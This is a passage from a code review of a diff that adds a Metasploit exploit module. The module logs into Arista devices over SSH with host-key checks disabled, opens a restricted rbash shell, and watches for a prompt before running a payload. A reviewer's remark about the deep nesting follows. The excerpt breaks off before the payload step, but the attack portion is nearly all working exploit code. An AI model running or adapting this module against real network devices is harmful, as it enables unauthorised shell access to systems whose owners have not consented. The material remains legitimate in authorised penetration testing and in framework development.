modules/exploits/unix/ssh/arista_tacplus_shell.rb

```diff
@@ -0,0 +1,196 @@
+        Net::SSH.start(rhost, username, opts)
+      end
+    rescue Rex::ConnectionError
+      return Exploit::CheckCode::Safe
+    rescue Net::SSH::Disconnect, ::EOFError
+      return Exploit::CheckCode::Safe
+    rescue ::Timeout::Error
+      return Exploit::CheckCode::Safe
+    rescue Net::SSH::AuthenticationFailed
+      return Exploit::CheckCode::Safe
+    rescue Net::SSH::Exception
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Vulnerable
+
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def lport
+    datastore['LPORT']
+  end
+
+  def lhost
+    datastore['LHOST']
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def exploit
+    factory = ssh_socket_factory
+
+    opts = {
+      auth_methods: ['password', 'keyboard-interactive'],
+      port: rport,
+      use_agent: false,
+      config: false,
+      password: password,
+      proxy: factory,
+      non_interactive: true,
+      verify_host_key: :never
+    }
+
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    print_status("#{rhost}:#{rport} - Attempt to login to the Arista's restricted shell...")
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, username, opts)
+      end
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
+    rescue Net::SSH::Disconnect, ::EOFError
+      fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
+    rescue ::Timeout::Error
+      fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
+    rescue Net::SSH::AuthenticationFailed
+      fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
+    rescue Net::SSH::Exception => e
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
+    end
+
+    fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
+    begin
+      payload_executed = false
+      print_good('SSH connection established.')
+
+      ssh.open_channel do |channel, _data|
+        print_status('Requesting pty rbash')
+
+        channel.request_pty do |ch, success|
+          fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not request a PTY!") unless success
+          print_good('PTY successfully obtained.')
+
+          print_status('Requesting a shell.')
+          ch.send_channel_request('shell') do |cha, _succ|
+            fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not open rbash shell!") unless success
+            print_good('Spawned into arista rbash shell.')
+
+            cha.on_data do |_xx, data2|
+              if data2.include? '#'
+                if !payload_executed
```

Comment:
Note that it really matters, but these would be cleaner as a guard clause. This is seven layers of indentation deep, which is unnecessary madness.